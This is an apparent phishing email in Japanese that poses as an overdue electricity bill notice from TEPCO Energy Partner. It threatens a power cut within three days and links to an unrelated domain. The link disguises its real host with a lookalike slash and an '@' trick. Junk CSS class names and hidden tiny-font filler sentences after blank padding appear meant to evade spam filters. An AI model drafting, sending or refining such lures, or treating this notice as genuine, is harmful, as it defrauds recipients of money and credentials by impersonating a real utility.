【重要】未納の電気代についてお知らせ申し上げます。EJ=184362288232572
<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta name=GENERATOR content="MSHTML 11.00.10570.1001"><style>
.cdpzpecrkmtjdslqxu .TLWwTiKnTK-jCO-pwMyhBwszX #HTfcg-lvHCLZtvBP-iEWyqycy .Jlmtjk-Zpabroor .udxouunxvikbp #Aebyqzunf-Dyjxrpaz .RIJnxDqFCvHjPB #RQq-sfIEB-IQbFxklkAt .Myrgmtojeuz #Emoaryqqunvfzoizljqk {
page-break-after:auto;
column-fill:balance;
}
</style><style>
#CzbcxqmcMX-bmNQh-woOZ #Qnsctuswwzc #Jwtnpa-Ikr-Hok .nhslypdhygmehrrkrbka #Ghcb-Lfh .ETc-woG-GMFg #Xwjma-Acldvna-Sznkgcuiq .Gvlrezcsojyn .OGUFNFt-NeMTUDCmLs {
z-index:auto;
object-position:50% 50%;
}
</style></head><body><div style="font-family: Arial, sans-serif; max-width: 680px; margin: 0 auto; padding: 20px;"> <table width="100%" border="0" cellpadding="10" style="background: #fff; border: 1px solid #ecf0f1;"> <tr> <td style="text-align: center; background: #f1c40f;"> <h3 style="color: #2c3e50;">電気料金未払いのお知らせ</h3> </td> </tr> <tr> <td> <p>お客様へ、</p> <p>未払いの電気料金が確認されております。以下の請求書番号をご確認の上、速やかにお支払いください。</p> <p style="font-weight: bold;">請求書番号: 25435856478</p> <p>お支払い期限は3天以内です。期限を過ぎると電力供給が停止される可能性があります。</p> <p><a href="https://anaastajuwy.com∕olcedacfd@tgcb.asia/?idtokengjcwyt=kdszdf">▼ 支払いの詳細リンクエント</a></p> <p>※リンクの有効期限は3天です。</p> <p style="font-size: 12px; text-align: center;">東京電力エナジーパートナー株式会社<br>〒100-8560 東京都千代田区内幸町1丁目1番3号</p> </td> </tr> </table></div><p style="FONT-SIZE: 12px"><p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</p><p><font size=1>1.個人情報へのアクセスを監視する専用ソフトウェアを導入する。</font></p><p><font size=1>2.リコール通知は迅速に送信されます。</font></p><p><font size=1>3.盗難報告は多言語チャットで対応します。</font></p><p><font size=1>4.顧客のフィードバックを、星形ボードで社内展示する。</font></p><p><font size=1>5.顧客の不満を、赤いサイレン音で即時管理者に通知する。</font></p><p><font size=1>6.警報器交換は自動スケジュールされます。</font></p><p><font size=1>7... サービス提案は個別最適化されます。 </font></p><p><font size=1>8.満足度調査は週次で実施されます。</font></p><p><font size=1>9.サービスのメンテナンス時間を、毎週火曜の深夜時に設定する。</font></p><p><font size=1>10.共同利用者のセキュリティ教育を、ピンクのクイズで実施する。</font></p><p><font size=1>11.警報器交換はAIでスケジュール管理されます。</font></p><p><font size=1>12.顧客向けFAQを、星形スライドで社内共有する。</font></p><p> </p></body></html>